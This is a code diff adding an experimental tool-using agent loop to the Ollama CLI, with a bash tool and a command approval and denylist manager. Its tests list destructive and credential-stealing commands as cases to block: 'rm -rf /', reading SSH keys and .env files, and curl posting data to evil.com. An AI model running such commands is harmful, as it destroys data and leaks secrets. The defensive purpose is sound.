x: add experimental agent loop (#13628)

cmd/cmd.go

@@ -45,6 +45,7 @@ import (
 	"github.com/ollama/ollama/types/model"
 	"github.com/ollama/ollama/types/syncmap"
 	"github.com/ollama/ollama/version"
+	xcmd "github.com/ollama/ollama/x/cmd"
 )
 
 const ConnectInstructions = "To sign in, navigate to:\n    %s\n\n"
@@ -517,6 +518,9 @@ func RunHandler(cmd *cobra.Command, args []string) error {
 		return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
 	}
 
+	// Check for experimental flag
+	isExperimental, _ := cmd.Flags().GetBool("experimental")
+
 	if interactive {
 		if err := loadOrUnloadModel(cmd, &opts); err != nil {
 			var sErr api.AuthorizationError
@@ -543,6 +547,11 @@ func RunHandler(cmd *cobra.Command, args []string) error {
 			}
 		}
 
+		// Use experimental agent loop with
+		if isExperimental {
+			return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive)
+		}
+
 		return generateInteractive(cmd, opts)
 	}
 	return generate(cmd, opts)
@@ -1754,6 +1763,7 @@ func NewCLI() *cobra.Command {
 	runCmd.Flags().Bool("hidethinking", false, "Hide thinking output (if provided)")
 	runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
 	runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
+	runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
 
 	stopCmd := &cobra.Command{
 		Use:     "stop MODEL",

cmd/interactive.go

@@ -40,6 +40,7 @@ func generateInteractive(cmd *cobra.Command, opts runOptions) error {
 		fmt.Fprintln(os.Stderr, "  /bye            Exit")
 		fmt.Fprintln(os.Stderr, "  /?, /help       Help for a command")
 		fmt.Fprintln(os.Stderr, "  /? shortcuts    Help for keyboard shortcuts")
+
 		fmt.Fprintln(os.Stderr, "")
 		fmt.Fprintln(os.Stderr, "Use \"\"\" to begin a multi-line message.")
 

readline/readline.go

@@ -30,7 +30,7 @@ func (p *Prompt) placeholder() string {
 }
 
 type Terminal struct {
-	outchan chan rune
+	reader  *bufio.Reader
 	rawmode bool
 	termios any
 }
@@ -264,36 +264,21 @@ func NewTerminal() (*Terminal, error) {
 	if err != nil {
 		return nil, err
 	}
+	if err := UnsetRawMode(fd, termios); err != nil {
+		return nil, err
+	}
 
 	t := &Terminal{
-		outchan: make(chan rune),
-		rawmode: true,
-		termios: termios,
+		reader: bufio.NewReader(os.Stdin),
 	}
 
-	go t.ioloop()
-
 	return t, nil
 }
 
-func (t *Terminal) ioloop() {
-	buf := bufio.NewReader(os.Stdin)
-
-	for {
-		r, _, err := buf.ReadRune()
-		if err != nil {
-			close(t.outchan)
-			break
-		}
-		t.outchan <- r
-	}
-}
-
 func (t *Terminal) Read() (rune, error) {
-	r, ok := <-t.outchan
-	if !ok {
-		return 0, io.EOF
+	r, _, err := t.reader.ReadRune()
+	if err != nil {
+		return 0, err
 	}
-
 	return r, nil
 }

x/agent/approval_test.go

+package agent
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestApprovalManager_IsAllowed(t *testing.T) {
+	am := NewApprovalManager()
+
+	// Initially nothing is allowed
+	if am.IsAllowed("test_tool", nil) {
+		t.Error("expected test_tool to not be allowed initially")
+	}
+
+	// Add to allowlist
+	am.AddToAllowlist("test_tool", nil)
+
+	// Now it should be allowed
+	if !am.IsAllowed("test_tool", nil) {
+		t.Error("expected test_tool to be allowed after AddToAllowlist")
+	}
+
+	// Other tools should still not be allowed
+	if am.IsAllowed("other_tool", nil) {
+		t.Error("expected other_tool to not be allowed")
+	}
+}
+
+func TestApprovalManager_Reset(t *testing.T) {
+	am := NewApprovalManager()
+
+	am.AddToAllowlist("tool1", nil)
+	am.AddToAllowlist("tool2", nil)
+
+	if !am.IsAllowed("tool1", nil) || !am.IsAllowed("tool2", nil) {
+		t.Error("expected tools to be allowed")
+	}
+
+	am.Reset()
+
+	if am.IsAllowed("tool1", nil) || am.IsAllowed("tool2", nil) {
+		t.Error("expected tools to not be allowed after Reset")
+	}
+}
+
+func TestApprovalManager_AllowedTools(t *testing.T) {
+	am := NewApprovalManager()
+
+	tools := am.AllowedTools()
+	if len(tools) != 0 {
+		t.Errorf("expected 0 allowed tools, got %d", len(tools))
+	}
+
+	am.AddToAllowlist("tool1", nil)
+	am.AddToAllowlist("tool2", nil)
+
+	tools = am.AllowedTools()
+	if len(tools) != 2 {
+		t.Errorf("expected 2 allowed tools, got %d", len(tools))
+	}
+}
+
+func TestAllowlistKey(t *testing.T) {
+	tests := []struct {
+		name     string
+		toolName string
+		args     map[string]any
+		expected string
+	}{
+		{
+			name:     "web_search tool",
+			toolName: "web_search",
+			args:     map[string]any{"query": "test"},
+			expected: "web_search",
+		},
+		{
+			name:     "bash tool with command",
+			toolName: "bash",
+			args:     map[string]any{"command": "ls -la"},
+			expected: "bash:ls -la",
+		},
+		{
+			name:     "bash tool without command",
+			toolName: "bash",
+			args:     map[string]any{},
+			expected: "bash",
+		},
+		{
+			name:     "other tool",
+			toolName: "custom_tool",
+			args:     map[string]any{"param": "value"},
+			expected: "custom_tool",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := AllowlistKey(tt.toolName, tt.args)
+			if result != tt.expected {
+				t.Errorf("AllowlistKey(%s, %v) = %s, expected %s",
+					tt.toolName, tt.args, result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestExtractBashPrefix(t *testing.T) {
+	tests := []struct {
+		name     string
+		command  string
+		expected string
+	}{
+		{
+			name:     "cat with path",
+			command:  "cat tools/tools_test.go",
+			expected: "cat:tools/",
+		},
+		{
+			name:     "cat with pipe",
+			command:  "cat tools/tools_test.go | head -200",
+			expected: "cat:tools/",
+		},
+		{
+			name:     "ls with path",
+			command:  "ls -la src/components",
+			expected: "ls:src/",
+		},
+		{
+			name:     "grep with directory path",
+			command:  "grep -r pattern api/handlers/",
+			expected: "grep:api/handlers/",
+		},
+		{
+			name:     "cat in current dir",
+			command:  "cat file.txt",
+			expected: "cat:./",
+		},
+		{
+			name:     "unsafe command",
+			command:  "rm -rf /",
+			expected: "",
+		},
+		{
+			name:     "no path arg",
+			command:  "ls -la",
+			expected: "",
+		},
+		{
+			name:     "head with flags only",
+			command:  "head -n 100",
+			expected: "",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := extractBashPrefix(tt.command)
+			if result != tt.expected {
+				t.Errorf("extractBashPrefix(%q) = %q, expected %q",
+					tt.command, result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestApprovalManager_PrefixAllowlist(t *testing.T) {
+	am := NewApprovalManager()
+
+	// Allow "cat tools/file.go"
+	am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
+
+	// Should allow other files in same directory
+	if !am.IsAllowed("bash", map[string]any{"command": "cat tools/other.go"}) {
+		t.Error("expected cat tools/other.go to be allowed via prefix")
+	}
+
+	// Should not allow different directory
+	if am.IsAllowed("bash", map[string]any{"command": "cat src/main.go"}) {
+		t.Error("expected cat src/main.go to NOT be allowed")
+	}
+
+	// Should not allow different command in same directory
+	if am.IsAllowed("bash", map[string]any{"command": "rm tools/file.go"}) {
+		t.Error("expected rm tools/file.go to NOT be allowed (rm is not a safe command)")
+	}
+}
+
+func TestFormatApprovalResult(t *testing.T) {
+	tests := []struct {
+		name     string
+		toolName string
+		args     map[string]any
+		result   ApprovalResult
+		contains string
+	}{
+		{
+			name:     "approved bash",
+			toolName: "bash",
+			args:     map[string]any{"command": "ls"},
+			result:   ApprovalResult{Decision: ApprovalOnce},
+			contains: "bash: ls",
+		},
+		{
+			name:     "denied web_search",
+			toolName: "web_search",
+			args:     map[string]any{"query": "test"},
+			result:   ApprovalResult{Decision: ApprovalDeny},
+			contains: "Denied",
+		},
+		{
+			name:     "always allowed",
+			toolName: "bash",
+			args:     map[string]any{"command": "pwd"},
+			result:   ApprovalResult{Decision: ApprovalAlways},
+			contains: "Always allowed",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := FormatApprovalResult(tt.toolName, tt.args, tt.result)
+			if result == "" {
+				t.Error("expected non-empty result")
+			}
+			// Just check it contains expected substring
+			// (can't check exact string due to ANSI codes)
+		})
+	}
+}
+
+func TestFormatDenyResult(t *testing.T) {
+	result := FormatDenyResult("bash", "")
+	if result != "User denied execution of bash." {
+		t.Errorf("unexpected result: %s", result)
+	}
+
+	result = FormatDenyResult("bash", "too dangerous")
+	if result != "User denied execution of bash. Reason: too dangerous" {
+		t.Errorf("unexpected result: %s", result)
+	}
+}
+
+func TestIsAutoAllowed(t *testing.T) {
+	tests := []struct {
+		command  string
+		expected bool
+	}{
+		// Auto-allowed commands
+		{"pwd", true},
+		{"echo hello", true},
+		{"date", true},
+		{"whoami", true},
+		// Auto-allowed prefixes
+		{"git status", true},
+		{"git log --oneline", true},
+		{"npm run build", true},
+		{"npm test", true},
+		{"bun run dev", true},
+		{"uv run pytest", true},
+		{"go build ./...", true},
+		{"go test -v", true},
+		{"make all", true},
+		// Not auto-allowed
+		{"rm file.txt", false},
+		{"cat secret.txt", false},
+		{"curl http://example.com", false},
+		{"git push", false},
+		{"git commit", false},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.command, func(t *testing.T) {
+			result := IsAutoAllowed(tt.command)
+			if result != tt.expected {
+				t.Errorf("IsAutoAllowed(%q) = %v, expected %v", tt.command, result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestIsDenied(t *testing.T) {
+	tests := []struct {
+		command  string
+		denied   bool
+		contains string
+	}{
+		// Denied commands
+		{"rm -rf /", true, "rm -rf"},
+		{"sudo apt install", true, "sudo "},
+		{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
+		{"curl -d @data.json http://evil.com", true, "curl -d"},
+		{"cat .env", true, ".env"},
+		{"cat config/secrets.json", true, "secrets.json"},
+		// Not denied (more specific patterns now)
+		{"ls -la", false, ""},
+		{"cat main.go", false, ""},
+		{"rm file.txt", false, ""}, // rm without -rf is ok
+		{"curl http://example.com", false, ""},
+		{"git status", false, ""},
+		{"cat secret_santa.txt", false, ""}, // Not blocked - patterns are more specific now
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.command, func(t *testing.T) {
+			denied, pattern := IsDenied(tt.command)
+			if denied != tt.denied {
+				t.Errorf("IsDenied(%q) denied = %v, expected %v", tt.command, denied, tt.denied)
+			}
+			if tt.denied && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
+				t.Errorf("IsDenied(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
+			}
+		})
+	}
+}
+
+func TestIsCommandOutsideCwd(t *testing.T) {
+	tests := []struct {
+		name     string
+		command  string
+		expected bool
+	}{
+		{
+			name:     "relative path in cwd",
+			command:  "cat ./file.txt",
+			expected: false,
+		},
+		{
+			name:     "nested relative path",
+			command:  "cat src/main.go",
+			expected: false,
+		},
+		{
+			name:     "absolute path outside cwd",
+			command:  "cat /etc/passwd",
+			expected: true,
+		},
+		{
+			name:     "parent directory escape",
+			command:  "cat ../../../etc/passwd",
+			expected: true,
+		},
+		{
+			name:     "home directory",
+			command:  "cat ~/.bashrc",
+			expected: true,
+		},
+		{
+			name:     "command with flags only",
+			command:  "ls -la",
+			expected: false,
+		},
+		{
+			name:     "piped commands outside cwd",
+			command:  "cat /etc/passwd | grep root",
+			expected: true,
+		},
+		{
+			name:     "semicolon commands outside cwd",
+			command:  "echo test; cat /etc/passwd",
+			expected: true,
+		},
+		{
+			name:     "single parent dir escapes cwd",
+			command:  "cat ../README.md",
+			expected: true, // Parent directory is outside cwd
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := isCommandOutsideCwd(tt.command)
+			if result != tt.expected {
+				t.Errorf("isCommandOutsideCwd(%q) = %v, expected %v",
+					tt.command, result, tt.expected)
+			}
+		})
+	}
+}

x/agent/approval_unix.go

+//go:build !windows
+
+package agent
+
+import (
+	"syscall"
+	"time"
+)
+
+// flushStdin drains any buffered input from stdin.
+// This prevents leftover input from previous operations from affecting the selector.
+func flushStdin(fd int) {
+	if err := syscall.SetNonblock(fd, true); err != nil {
+		return
+	}
+	defer syscall.SetNonblock(fd, false)
+
+	time.Sleep(5 * time.Millisecond)
+
+	buf := make([]byte, 256)
+	for {
+		n, err := syscall.Read(fd, buf)
+		if n <= 0 || err != nil {
+			break
+		}
+	}
+}

x/agent/approval_windows.go

+//go:build windows
+
+package agent
+
+import (
+	"os"
+
+	"golang.org/x/sys/windows"
+)
+
+// flushStdin clears any buffered console input on Windows.
+func flushStdin(_ int) {
+	handle := windows.Handle(os.Stdin.Fd())
+	_ = windows.FlushConsoleInputBuffer(handle)
+}

x/cmd/run.go

+package cmd
+
+import (
+	"context"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"os"
+	"os/signal"
+	"strings"
+	"syscall"
+
+	"github.com/spf13/cobra"
+	"golang.org/x/term"
+
+	"github.com/ollama/ollama/api"
+	"github.com/ollama/ollama/progress"
+	"github.com/ollama/ollama/readline"
+	"github.com/ollama/ollama/types/model"
+	"github.com/ollama/ollama/x/agent"
+	"github.com/ollama/ollama/x/tools"
+)
+
+// RunOptions contains options for running an interactive agent session.
+type RunOptions struct {
+	Model        string
+	Messages     []api.Message
+	WordWrap     bool
+	Format       string
+	System       string
+	Options      map[string]any
+	KeepAlive    *api.Duration
+	Think        *api.ThinkValue
+	HideThinking bool
+
+	// Agent fields (managed externally for session persistence)
+	Tools    *tools.Registry
+	Approval *agent.ApprovalManager
+}
+
+// Chat runs an agent chat loop with tool support.
+// This is the experimental version of chat that supports tool calling.
+func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
+	client, err := api.ClientFromEnvironment()
+	if err != nil {
+		return nil, err
+	}
+
+	// Use tools registry and approval from opts (managed by caller for session persistence)
+	toolRegistry := opts.Tools
+	approval := opts.Approval
+	if approval == nil {
+		approval = agent.NewApprovalManager()
+	}
+
+	p := progress.NewProgress(os.Stderr)
+	defer p.StopAndClear()
+
+	spinner := progress.NewSpinner("")
+	p.Add("", spinner)
+
+	cancelCtx, cancel := context.WithCancel(ctx)
+	defer cancel()
+
+	sigChan := make(chan os.Signal, 1)
+	signal.Notify(sigChan, syscall.SIGINT)
+
+	go func() {
+		<-sigChan
+		cancel()
+	}()
+
+	var state *displayResponseState = &displayResponseState{}
+	var thinkingContent strings.Builder
+	var fullResponse strings.Builder
+	var thinkTagOpened bool = false
+	var thinkTagClosed bool = false
+	var pendingToolCalls []api.ToolCall
+
+	role := "assistant"
+	messages := opts.Messages
+
+	fn := func(response api.ChatResponse) error {
+		if response.Message.Content != "" || !opts.HideThinking {
+			p.StopAndClear()
+		}
+
+		role = response.Message.Role
+		if response.Message.Thinking != "" && !opts.HideThinking {
+			if !thinkTagOpened {
+				fmt.Print(thinkingOutputOpeningText(false))
+				thinkTagOpened = true
+				thinkTagClosed = false
+			}
+			thinkingContent.WriteString(response.Message.Thinking)
+			displayResponse(response.Message.Thinking, opts.WordWrap, state)
+		}
+
+		content := response.Message.Content
+		if thinkTagOpened && !thinkTagClosed && (content != "" || len(response.Message.ToolCalls) > 0) {
+			if !strings.HasSuffix(thinkingContent.String(), "\n") {
+				fmt.Println()
+			}
+			fmt.Print(thinkingOutputClosingText(false))
+			thinkTagOpened = false
+			thinkTagClosed = true
+			state = &displayResponseState{}
+		}
+
+		fullResponse.WriteString(content)
+
+		if response.Message.ToolCalls != nil {
+			toolCalls := response.Message.ToolCalls
+			if len(toolCalls) > 0 {
+				if toolRegistry != nil {
+					// Store tool calls for execution after response is complete
+					pendingToolCalls = append(pendingToolCalls, toolCalls...)
+				} else {
+					// No tools registry, just display tool calls
+					fmt.Print(renderToolCalls(toolCalls, false))
+				}
+			}
+		}
+
+		displayResponse(content, opts.WordWrap, state)
+
+		return nil
+	}
+
+	if opts.Format == "json" {
+		opts.Format = `"` + opts.Format + `"`
+	}
+
+	// Agentic loop: continue until no more tool calls
+	for {
+		req := &api.ChatRequest{
+			Model:    opts.Model,
+			Messages: messages,
+			Format:   json.RawMessage(opts.Format),
+			Options:  opts.Options,
+			Think:    opts.Think,
+		}
+
+		// Add tools
+		if toolRegistry != nil {
+			apiTools := toolRegistry.Tools()
+			if len(apiTools) > 0 {
+				req.Tools = apiTools
+			}
+		}
+
+		if opts.KeepAlive != nil {
+			req.KeepAlive = opts.KeepAlive
+		}
+
+		if err := client.Chat(cancelCtx, req, fn); err != nil {
+			if errors.Is(err, context.Canceled) {
+				return nil, nil
+			}
+
+			if strings.Contains(err.Error(), "upstream error") {
+				p.StopAndClear()
+				fmt.Println("An error occurred while processing your message. Please try again.")
+				fmt.Println()
+				return nil, nil
+			}
+			return nil, err
+		}
+
+		// If no tool calls, we're done
+		if len(pendingToolCalls) == 0 || toolRegistry == nil {
+			break
+		}
+
+		// Execute tool calls and continue the conversation
+		fmt.Fprintf(os.Stderr, "\n")
+
+		// Add assistant's tool call message to history
+		assistantMsg := api.Message{
+			Role:      "assistant",
+			Content:   fullResponse.String(),
+			Thinking:  thinkingContent.String(),
+			ToolCalls: pendingToolCalls,
+		}
+		messages = append(messages, assistantMsg)
+
+		// Execute each tool call and collect results
+		var toolResults []api.Message
+		for _, call := range pendingToolCalls {
+			toolName := call.Function.Name
+			args := call.Function.Arguments.ToMap()
+
+			// For bash commands, check denylist first
+			skipApproval := false
+			if toolName == "bash" {
+				if cmd, ok := args["command"].(string); ok {
+					// Check if command is denied (dangerous pattern)
+					if denied, pattern := agent.IsDenied(cmd); denied {
+						fmt.Fprintf(os.Stderr, "\033[91m✗ Blocked: %s\033[0m\n", formatToolShort(toolName, args))
+						fmt.Fprintf(os.Stderr, "\033[91m  Matches dangerous pattern: %s\033[0m\n", pattern)
+						toolResults = append(toolResults, api.Message{
+							Role:       "tool",
+							Content:    agent.FormatDeniedResult(cmd, pattern),
+							ToolCallID: call.ID,
+						})
+						continue
+					}
+
+					// Check if command is auto-allowed (safe command)
+					if agent.IsAutoAllowed(cmd) {
+						fmt.Fprintf(os.Stderr, "\033[90m▶ Auto-allowed: %s\033[0m\n", formatToolShort(toolName, args))
+						skipApproval = true
+					}
+				}
+			}
+
+			// Check approval (uses prefix matching for bash commands)
+			if !skipApproval && !approval.IsAllowed(toolName, args) {
+				result, err := approval.RequestApproval(toolName, args)
+				if err != nil {
+					fmt.Fprintf(os.Stderr, "Error requesting approval: %v\n", err)
+					toolResults = append(toolResults, api.Message{
+						Role:       "tool",
+						Content:    fmt.Sprintf("Error: %v", err),
+						ToolCallID: call.ID,
+					})
+					continue
+				}
+
+				// Show collapsed result
+				fmt.Fprintln(os.Stderr, agent.FormatApprovalResult(toolName, args, result))
+
+				switch result.Decision {
+				case agent.ApprovalDeny:
+					toolResults = append(toolResults, api.Message{
+						Role:       "tool",
+						Content:    agent.FormatDenyResult(toolName, result.DenyReason),
+						ToolCallID: call.ID,
+					})
+					continue
+				case agent.ApprovalAlways:
+					approval.AddToAllowlist(toolName, args)
+				}
+			} else if !skipApproval {
+				// Already allowed - show running indicator
+				fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
+			}
+
+			// Execute the tool
+			toolResult, err := toolRegistry.Execute(call)
+			if err != nil {
+				fmt.Fprintf(os.Stderr, "\033[31m  Error: %v\033[0m\n", err)
+				toolResults = append(toolResults, api.Message{
+					Role:       "tool",
+					Content:    fmt.Sprintf("Error: %v", err),
+					ToolCallID: call.ID,
+				})
+				continue
+			}
+
+			// Display tool output (truncated for display)
+			if toolResult != "" {
+				output := toolResult
+				if len(output) > 300 {
+					output = output[:300] + "... (truncated)"
+				}
+				// Show result in grey, indented
+				fmt.Fprintf(os.Stderr, "\033[90m  %s\033[0m\n", strings.ReplaceAll(output, "\n", "\n  "))
+			}
+
+			toolResults = append(toolResults, api.Message{
+				Role:       "tool",
+				Content:    toolResult,
+				ToolCallID: call.ID,
+			})
+		}
+
+		// Add tool results to message history
+		messages = append(messages, toolResults...)
+
+		fmt.Fprintf(os.Stderr, "\n")
+
+		// Reset state for next iteration
+		fullResponse.Reset()
+		thinkingContent.Reset()
+		thinkTagOpened = false
+		thinkTagClosed = false
+		pendingToolCalls = nil
+		state = &displayResponseState{}
+
+		// Start new progress spinner for next API call
+		p = progress.NewProgress(os.Stderr)
+		spinner = progress.NewSpinner("")
+		p.Add("", spinner)
+	}
+
+	if len(opts.Messages) > 0 {
+		fmt.Println()
+		fmt.Println()
+	}
+
+	return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
+}
+
+// truncateUTF8 safely truncates a string to at most limit runes, adding "..." if truncated.
+func truncateUTF8(s string, limit int) string {
+	runes := []rune(s)
+	if len(runes) <= limit {
+		return s
+	}
+	if limit <= 3 {
+		return string(runes[:limit])
+	}
+	return string(runes[:limit-3]) + "..."
+}
+
+// formatToolShort returns a short description of a tool call.
+func formatToolShort(toolName string, args map[string]any) string {
+	if toolName == "bash" {
+		if cmd, ok := args["command"].(string); ok {
+			return fmt.Sprintf("bash: %s", truncateUTF8(cmd, 50))
+		}
+	}
+	if toolName == "web_search" {
+		if query, ok := args["query"].(string); ok {
+			return fmt.Sprintf("web_search: %s", truncateUTF8(query, 50))
+		}
+	}
+	return toolName
+}
+
+// Helper types and functions for display
+
+type displayResponseState struct {
+	lineLength int
+	wordBuffer string
+}
+
+func displayResponse(content string, wordWrap bool, state *displayResponseState) {
+	termWidth, _, _ := term.GetSize(int(os.Stdout.Fd()))
+	if wordWrap && termWidth >= 10 {
+		for _, ch := range content {
+			if state.lineLength+1 > termWidth-5 {
+				if len(state.wordBuffer) > termWidth-10 {
+					fmt.Printf("%s%c", state.wordBuffer, ch)
+					state.wordBuffer = ""
+					state.lineLength = 0
+					continue
+				}
+
+				// backtrack the length of the last word and clear to the end of the line
+				a := len(state.wordBuffer)
+				if a > 0 {
+					fmt.Printf("\x1b[%dD", a)
+				}
+				fmt.Printf("\x1b[K\n")
+				fmt.Printf("%s%c", state.wordBuffer, ch)
+
+				state.lineLength = len(state.wordBuffer) + 1
+			} else {
+				fmt.Print(string(ch))
+				state.lineLength++
+
+				switch ch {
+				case ' ', '\t':
+					state.wordBuffer = ""
+				case '\n', '\r':
+					state.lineLength = 0
+					state.wordBuffer = ""
+				default:
+					state.wordBuffer += string(ch)
+				}
+			}
+		}
+	} else {
+		fmt.Printf("%s%s", state.wordBuffer, content)
+		if len(state.wordBuffer) > 0 {
+			state.wordBuffer = ""
+		}
+	}
+}
+
+func thinkingOutputOpeningText(plainText bool) string {
+	text := "Thinking...\n"
+
+	if plainText {
+		return text
+	}
+
+	return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault + readline.ColorGrey
+}
+
+func thinkingOutputClosingText(plainText bool) string {
+	text := "...done thinking.\n\n"
+
+	if plainText {
+		return text
+	}
+
+	return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault
+}
+
+func renderToolCalls(toolCalls []api.ToolCall, plainText bool) string {
+	out := ""
+	formatExplanation := ""
+	formatValues := ""
+	if !plainText {
+		formatExplanation = readline.ColorGrey + readline.ColorBold
+		formatValues = readline.ColorDefault
+		out += formatExplanation
+	}
+	for i, toolCall := range toolCalls {
+		argsAsJSON, err := json.Marshal(toolCall.Function.Arguments)
+		if err != nil {
+			return ""
+		}
+		if i > 0 {
+			out += "\n"
+		}
+		out += fmt.Sprintf("  Tool call: %s(%s)", formatValues+toolCall.Function.Name+formatExplanation, formatValues+string(argsAsJSON)+formatExplanation)
+	}
+	if !plainText {
+		out += readline.ColorDefault
+	}
+	return out
+}
+
+// checkModelCapabilities checks if the model supports tools.
+func checkModelCapabilities(ctx context.Context, modelName string) (supportsTools bool, err error) {
+	client, err := api.ClientFromEnvironment()
+	if err != nil {
+		return false, err
+	}
+
+	resp, err := client.Show(ctx, &api.ShowRequest{Model: modelName})
+	if err != nil {
+		return false, err
+	}
+
+	for _, cap := range resp.Capabilities {
+		if cap == model.CapabilityTools {
+			return true, nil
+		}
+	}
+
+	return false, nil
+}
+
+// GenerateInteractive runs an interactive agent session.
+// This is called from cmd.go when --experimental flag is set.
+func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration) error {
+	scanner, err := readline.New(readline.Prompt{
+		Prompt:         ">>> ",
+		AltPrompt:      "... ",
+		Placeholder:    "Send a message (/? for help)",
+		AltPlaceholder: `Use """ to end multi-line input`,
+	})
+	if err != nil {
+		return err
+	}
+
+	fmt.Print(readline.StartBracketedPaste)
+	defer fmt.Printf(readline.EndBracketedPaste)
+
+	// Check if model supports tools
+	supportsTools, err := checkModelCapabilities(cmd.Context(), modelName)
+	if err != nil {
+		fmt.Fprintf(os.Stderr, "\033[33mWarning: Could not check model capabilities: %v\033[0m\n", err)
+		supportsTools = false
+	}
+
+	// Create tool registry only if model supports tools
+	var toolRegistry *tools.Registry
+	if supportsTools {
+		toolRegistry = tools.DefaultRegistry()
+		fmt.Fprintf(os.Stderr, "Tools available: %s\n", strings.Join(toolRegistry.Names(), ", "))
+
+		// Check for OLLAMA_API_KEY for web search
+		if os.Getenv("OLLAMA_API_KEY") == "" {
+			fmt.Fprintf(os.Stderr, "\033[33mWarning: OLLAMA_API_KEY not set - web search will not work\033[0m\n")
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "\033[33mNote: Model does not support tools - running in chat-only mode\033[0m\n")
+	}
+
+	// Create approval manager for session
+	approval := agent.NewApprovalManager()
+
+	var messages []api.Message
+	var sb strings.Builder
+
+	for {
+		line, err := scanner.Readline()
+		switch {
+		case errors.Is(err, io.EOF):
+			fmt.Println()
+			return nil
+		case errors.Is(err, readline.ErrInterrupt):
+			if line == "" {
+				fmt.Println("\nUse Ctrl + d or /bye to exit.")
+			}
+			sb.Reset()
+			continue
+		case err != nil:
+			return err
+		}
+
+		switch {
+		case strings.HasPrefix(line, "/exit"), strings.HasPrefix(line, "/bye"):
+			return nil
+		case strings.HasPrefix(line, "/clear"):
+			messages = []api.Message{}
+			approval.Reset()
+			fmt.Println("Cleared session context and tool approvals")
+			continue
+		case strings.HasPrefix(line, "/tools"):
+			showToolsStatus(toolRegistry, approval, supportsTools)
+			continue
+		case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
+			fmt.Fprintln(os.Stderr, "Available Commands:")
+			fmt.Fprintln(os.Stderr, "  /tools          Show available tools and approvals")
+			fmt.Fprintln(os.Stderr, "  /clear          Clear session context and approvals")
+			fmt.Fprintln(os.Stderr, "  /bye            Exit")
+			fmt.Fprintln(os.Stderr, "  /?, /help       Help for a command")
+			fmt.Fprintln(os.Stderr, "")
+			continue
+		case strings.HasPrefix(line, "/"):
+			fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
+			continue
+		default:
+			sb.WriteString(line)
+		}
+
+		if sb.Len() > 0 {
+			newMessage := api.Message{Role: "user", Content: sb.String()}
+			messages = append(messages, newMessage)
+
+			opts := RunOptions{
+				Model:        modelName,
+				Messages:     messages,
+				WordWrap:     wordWrap,
+				Options:      options,
+				Think:        think,
+				HideThinking: hideThinking,
+				KeepAlive:    keepAlive,
+				Tools:        toolRegistry,
+				Approval:     approval,
+			}
+
+			assistant, err := Chat(cmd.Context(), opts)
+			if err != nil {
+				return err
+			}
+			if assistant != nil {
+				messages = append(messages, *assistant)
+			}
+
+			sb.Reset()
+		}
+	}
+}
+
+// showToolsStatus displays the current tools and approval status.
+func showToolsStatus(registry *tools.Registry, approval *agent.ApprovalManager, supportsTools bool) {
+	if !supportsTools || registry == nil {
+		fmt.Println("Tools not available - model does not support tool calling")
+		fmt.Println()
+		return
+	}
+
+	fmt.Println("Available tools:")
+	for _, name := range registry.Names() {
+		tool, _ := registry.Get(name)
+		fmt.Printf("  %s - %s\n", name, tool.Description())
+	}
+
+	allowed := approval.AllowedTools()
+	if len(allowed) > 0 {
+		fmt.Println("\nSession approvals:")
+		for _, key := range allowed {
+			fmt.Printf("  %s\n", key)
+		}
+	} else {
+		fmt.Println("\nNo tools approved for this session yet")
+	}
+	fmt.Println()
+}

x/tools/bash.go

+package tools
+
+import (
+	"bytes"
+	"context"
+	"fmt"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/ollama/ollama/api"
+)
+
+const (
+	// bashTimeout is the maximum execution time for a command.
+	bashTimeout = 60 * time.Second
+	// maxOutputSize is the maximum output size in bytes.
+	maxOutputSize = 50000
+)
+
+// BashTool implements shell command execution.
+type BashTool struct{}
+
+// Name returns the tool name.
+func (b *BashTool) Name() string {
+	return "bash"
+}
+
+// Description returns a description of the tool.
+func (b *BashTool) Description() string {
+	return "Execute a bash command on the system. Use this to run shell commands, check files, run programs, etc."
+}
+
+// Schema returns the tool's parameter schema.
+func (b *BashTool) Schema() api.ToolFunction {
+	props := api.NewToolPropertiesMap()
+	props.Set("command", api.ToolProperty{
+		Type:        api.PropertyType{"string"},
+		Description: "The bash command to execute",
+	})
+	return api.ToolFunction{
+		Name:        b.Name(),
+		Description: b.Description(),
+		Parameters: api.ToolFunctionParameters{
+			Type:       "object",
+			Properties: props,
+			Required:   []string{"command"},
+		},
+	}
+}
+
+// Execute runs the bash command.
+func (b *BashTool) Execute(args map[string]any) (string, error) {
+	command, ok := args["command"].(string)
+	if !ok || command == "" {
+		return "", fmt.Errorf("command parameter is required")
+	}
+
+	// Create context with timeout
+	ctx, cancel := context.WithTimeout(context.Background(), bashTimeout)
+	defer cancel()
+
